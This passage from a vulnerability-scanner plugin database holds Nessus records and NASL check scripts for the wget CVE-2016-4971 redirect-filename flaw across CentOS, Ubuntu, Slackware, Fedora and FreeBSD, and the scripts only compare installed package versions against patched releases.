server\nresource. This could cause wget to create a file with a different name\nthan expected, possibly allowing the server to execute arbitrary code\non the client. 
(CVE-2016-4971)\n\nRed Hat would like to thank GNU wget project for reporting this issue.\nUpstream acknowledges Dawid Golunski as the original reporter.\n\nAdditional Changes :\n\nFor detailed information on changes in this release, see the Red Hat\nEnterprise Linux 7.3 Release Notes linked from the References section.\"\n );\n # https://lists.centos.org/pipermail/centos-cr-announce/2016-November/003557.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?95846b31\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected wget package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:N/I:P/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2016-4971\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:wget\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:centos:centos:7\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2016/06/30\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/11/25\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/11/28\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2016-2021 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n script_family(english:\"CentOS Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/CentOS/release\", \"Host/CentOS/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/CentOS/release\");\nif (isnull(release) || \"CentOS\" >!< release) audit(AUDIT_OS_NOT, \"CentOS\");\nos_ver = pregmatch(pattern: \"CentOS(?: Linux)? release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"CentOS\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^7([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"CentOS 7.x\", \"CentOS \" + os_ver);\n\nif (!get_kb_item(\"Host/CentOS/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"CentOS\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"CentOS-7\", cpu:\"x86_64\", reference:\"wget-1.14-13.el7\")) flag++;\n\n\nif (flag)\n{\n cr_plugin_caveat = '\\n' +\n 'NOTE: The security advisory associated with this vulnerability has a\\n' +\n 'fixed package version that may only be available in the continuous\\n' +\n 'release (CR) repository for CentOS, until it is present in the next\\n' +\n 'point release of CentOS.\\n\\n' +\n\n 'If an equal or higher package level does not exist in the baseline\\n' +\n 'repository for your major version of CentOS, then updates from the CR\\n' +\n 'repository will need to be applied in order to address the\\n' +\n 'vulnerability.\\n';\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : rpm_report_get() + cr_plugin_caveat\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) 
audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"wget\");\n}\n", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2023-01-13T14:41:10", "description": "Dawid Golunski discovered that Wget incorrectly handled filenames when being redirected from an HTTP to an FTP URL. A malicious server could possibly use this issue to overwrite local files.\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Ubuntu security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2016-06-21T00:00:00", "type": "nessus", "title": "Ubuntu 12.04 LTS / 14.04 LTS / 15.10 / 16.04 LTS : wget vulnerability (USN-3012-1)", "bulletinFamily": "scanner", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-4971"], "modified": "2023-01-12T00:00:00", "cpe": ["p-cpe:/a:canonical:ubuntu_linux:wget", "cpe:/o:canonical:ubuntu_linux:12.04:-:lts", "cpe:/o:canonical:ubuntu_linux:14.04", "cpe:/o:canonical:ubuntu_linux:15.10", 
"cpe:/o:canonical:ubuntu_linux:16.04"], "id": "UBUNTU_USN-3012-1.NASL", "href": "https://www.tenable.com/plugins/nessus/91728", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Ubuntu Security Notice USN-3012-1. The text \n# itself is copyright (C) Canonical, Inc. See \n# <http://www.ubuntu.com/usn/>. Ubuntu(R) is a registered \n# trademark of Canonical, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(91728);\n script_version(\"2.8\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/01/12\");\n\n script_cve_id(\"CVE-2016-4971\");\n script_xref(name:\"USN\", value:\"3012-1\");\n\n script_name(english:\"Ubuntu 12.04 LTS / 14.04 LTS / 15.10 / 16.04 LTS : wget vulnerability (USN-3012-1)\");\n script_summary(english:\"Checks dpkg output for updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\",\n value:\"The remote Ubuntu host is missing a security-related patch.\"\n );\n script_set_attribute(\n attribute:\"description\",\n value:\n\"Dawid Golunski discovered that Wget incorrectly handled filenames when\nbeing redirected from an HTTP to an FTP URL. A malicious server could\npossibly use this issue to overwrite local files.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Ubuntu security advisory. 
Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://usn.ubuntu.com/3012-1/\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected wget package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:N/I:P/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:wget\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:12.04:-:lts\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:14.04\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:15.10\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:16.04\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2016/06/30\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/06/20\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/06/21\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"Ubuntu Security Notice (C) 2016-2023 Canonical, Inc. / NASL script (C) 2016-2023 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n script_family(english:\"Ubuntu Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/cpu\", \"Host/Ubuntu\", \"Host/Ubuntu/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"ubuntu.inc\");\ninclude(\"misc_func.inc\");\n\nif ( ! get_kb_item(\"Host/local_checks_enabled\") ) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/Ubuntu/release\");\nif ( isnull(release) ) audit(AUDIT_OS_NOT, \"Ubuntu\");\nvar release = chomp(release);\nif (! preg(pattern:\"^(12\\.04|14\\.04|15\\.10|16\\.04)$\", string:release)) audit(AUDIT_OS_NOT, \"Ubuntu 12.04 / 14.04 / 15.10 / 16.04\", \"Ubuntu \" + release);\nif ( ! get_kb_item(\"Host/Debian/dpkg-l\") ) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nvar cpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif ('x86_64' >!< cpu && cpu !~ \"^i[3-6]86$\" && 's390' >!< cpu && 'aarch64' >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, 'Ubuntu', cpu);\n\nvar flag = 0;\n\nif (ubuntu_check(osver:\"12.04\", pkgname:\"wget\", pkgver:\"1.13.4-2ubuntu1.4\")) flag++;\nif (ubuntu_check(osver:\"14.04\", pkgname:\"wget\", pkgver:\"1.15-1ubuntu1.14.04.2\")) flag++;\nif (ubuntu_check(osver:\"15.10\", pkgname:\"wget\", pkgver:\"1.16.1-1ubuntu1.1\")) flag++;\nif (ubuntu_check(osver:\"16.04\", pkgname:\"wget\", pkgver:\"1.17.1-1ubuntu1.1\")) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : ubuntu_report_get()\n );\n exit(0);\n}\nelse\n{\n var tested = ubuntu_pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"wget\");\n}\n", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2023-01-11T16:39:06", "description": "New wget packages are available for Slackware 13.0, 13.1, 13.37, 14.0, 14.1, and -current to fix a security issue.", "cvss3": {"exploitabilityScore": 
2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2016-06-14T00:00:00", "type": "nessus", "title": "Slackware 13.0 / 13.1 / 13.37 / 14.0 / 14.1 / current : wget (SSA:2016-165-01)", "bulletinFamily": "scanner", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-4971"], "modified": "2021-01-14T00:00:00", "cpe": ["p-cpe:/a:slackware:slackware_linux:wget", "cpe:/o:slackware:slackware_linux", "cpe:/o:slackware:slackware_linux:13.0", "cpe:/o:slackware:slackware_linux:13.1", "cpe:/o:slackware:slackware_linux:13.37", "cpe:/o:slackware:slackware_linux:14.0", "cpe:/o:slackware:slackware_linux:14.1"], "id": "SLACKWARE_SSA_2016-165-01.NASL", "href": "https://www.tenable.com/plugins/nessus/91573", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Slackware Security Advisory 2016-165-01. 
The text \n# itself is copyright (C) Slackware Linux, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(91573);\n script_version(\"2.5\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2016-4971\");\n script_xref(name:\"SSA\", value:\"2016-165-01\");\n\n script_name(english:\"Slackware 13.0 / 13.1 / 13.37 / 14.0 / 14.1 / current : wget (SSA:2016-165-01)\");\n script_summary(english:\"Checks for updated package in /var/log/packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Slackware host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"New wget packages are available for Slackware 13.0, 13.1, 13.37,\n14.0, 14.1, and -current to fix a security issue.\"\n );\n # http://www.slackware.com/security/viewer.php?l=slackware-security&y=2016&m=slackware-security.532542\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?6d535496\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected wget package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:N/I:P/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:slackware:slackware_linux:wget\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:slackware:slackware_linux\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:slackware:slackware_linux:13.0\");\n 
script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:slackware:slackware_linux:13.1\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:slackware:slackware_linux:13.37\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:slackware:slackware_linux:14.0\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:slackware:slackware_linux:14.1\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/06/13\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/06/14\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2016-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Slackware Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Slackware/release\", \"Host/Slackware/packages\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"slackware.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Slackware/release\")) audit(AUDIT_OS_NOT, \"Slackware\");\nif (!get_kb_item(\"Host/Slackware/packages\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Slackware\", cpu);\n\n\nflag = 0;\nif (slackware_check(osver:\"13.0\", pkgname:\"wget\", pkgver:\"1.18\", pkgarch:\"i486\", pkgnum:\"1_slack13.0\")) flag++;\nif (slackware_check(osver:\"13.0\", arch:\"x86_64\", pkgname:\"wget\", pkgver:\"1.18\", pkgarch:\"x86_64\", pkgnum:\"1_slack13.0\")) flag++;\n\nif (slackware_check(osver:\"13.1\", pkgname:\"wget\", pkgver:\"1.18\", pkgarch:\"i486\", pkgnum:\"1_slack13.1\")) flag++;\nif (slackware_check(osver:\"13.1\", arch:\"x86_64\", pkgname:\"wget\", 
pkgver:\"1.18\", pkgarch:\"x86_64\", pkgnum:\"1_slack13.1\")) flag++;\n\nif (slackware_check(osver:\"13.37\", pkgname:\"wget\", pkgver:\"1.18\", pkgarch:\"i486\", pkgnum:\"1_slack13.37\")) flag++;\nif (slackware_check(osver:\"13.37\", arch:\"x86_64\", pkgname:\"wget\", pkgver:\"1.18\", pkgarch:\"x86_64\", pkgnum:\"1_slack13.37\")) flag++;\n\nif (slackware_check(osver:\"14.0\", pkgname:\"wget\", pkgver:\"1.18\", pkgarch:\"i486\", pkgnum:\"1_slack14.0\")) flag++;\nif (slackware_check(osver:\"14.0\", arch:\"x86_64\", pkgname:\"wget\", pkgver:\"1.18\", pkgarch:\"x86_64\", pkgnum:\"1_slack14.0\")) flag++;\n\nif (slackware_check(osver:\"14.1\", pkgname:\"wget\", pkgver:\"1.18\", pkgarch:\"i486\", pkgnum:\"1_slack14.1\")) flag++;\nif (slackware_check(osver:\"14.1\", arch:\"x86_64\", pkgname:\"wget\", pkgver:\"1.18\", pkgarch:\"x86_64\", pkgnum:\"1_slack14.1\")) flag++;\n\nif (slackware_check(osver:\"current\", pkgname:\"wget\", pkgver:\"1.18\", pkgarch:\"i586\", pkgnum:\"1\")) flag++;\nif (slackware_check(osver:\"current\", arch:\"x86_64\", pkgname:\"wget\", pkgver:\"1.18\", pkgarch:\"x86_64\", pkgnum:\"1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:slackware_report_get());\n else security_warning(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2023-01-11T16:40:25", "description": "Updated to 1.18 due to CVE-2016-4971\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Fedora update system website.\nTenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", 
"baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2016-07-14T00:00:00", "type": "nessus", "title": "Fedora 22 : wget (2016-24135dfe43)", "bulletinFamily": "scanner", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-4971"], "modified": "2021-01-11T00:00:00", "cpe": ["p-cpe:/a:fedoraproject:fedora:wget", "cpe:/o:fedoraproject:fedora:22"], "id": "FEDORA_2016-24135DFE43.NASL", "href": "https://www.tenable.com/plugins/nessus/92068", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory FEDORA-2016-24135dfe43.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(92068);\n script_version(\"1.7\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2016-4971\");\n script_xref(name:\"FEDORA\", value:\"2016-24135dfe43\");\n\n script_name(english:\"Fedora 22 : wget (2016-24135dfe43)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Updated to 1.18 due to CVE-2016-4971\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the 
Fedora update system website.\nTenable has attempted to automatically clean and format it as much as\npossible without introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bodhi.fedoraproject.org/updates/FEDORA-2016-24135dfe43\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected wget package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:N/I:P/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:wget\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:22\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2016/06/30\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/06/17\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/07/14\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2016-2021 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = pregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^22([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 22\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"FC22\", reference:\"wget-1.18-1.fc22\")) flag++;\n\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"wget\");\n}\n", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2023-01-11T16:40:08", "description": "GNU Wget contains a flaw that is triggered when handling server redirects to FTP resources, as the destination filename is obtained from the redirected URL and not original URL. 
With a specially crafted response, a context-dependent attacker may cause another filename to be used than intended, effectively allowing the attacker to execute arbitrary code.\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2016-07-12T00:00:00", "type": "nessus", "title": "wget < 1.18 Arbitrary Code Execution", "bulletinFamily": "scanner", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-4971"], "modified": "2016-07-12T00:00:00", "cpe": [], "id": "802003.PRM", "href": "https://www.tenable.com/plugins/lce/802003", "sourceData": "Binary data 802003.prm", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2023-01-11T16:39:56", "description": "Giuseppe Scrivano reports :\n\nOn a server redirect from HTTP to a FTP resource, wget would trust the HTTP server and uses the name in the redirected URL as the destination filename.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, 
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2016-06-22T00:00:00", "type": "nessus", "title": "FreeBSD : wget -- HTTP to FTP redirection file name confusion vulnerability (6df56c60-3738-11e6-a671-60a44ce6887b)", "bulletinFamily": "scanner", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-4971"], "modified": "2021-01-04T00:00:00", "cpe": ["p-cpe:/a:freebsd:freebsd:wget", "cpe:/o:freebsd:freebsd"], "id": "FREEBSD_PKG_6DF56C60373811E6A67160A44CE6887B.NASL", "href": "https://www.tenable.com/plugins/nessus/91734", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the FreeBSD VuXML database :\n#\n# Copyright 2003-2018 Jacques Vidrine and contributors\n#\n# Redistribution and use in source (VuXML) and 'compiled' forms (SGML,\n# HTML, PDF, PostScript, RTF and so forth) with or without modification,\n# are permitted provided that the following conditions are met:\n# 1. Redistributions of source code (VuXML) must retain the above\n# copyright notice, this list of conditions and the following\n# disclaimer as the first lines of this file unmodified.\n# 2. 
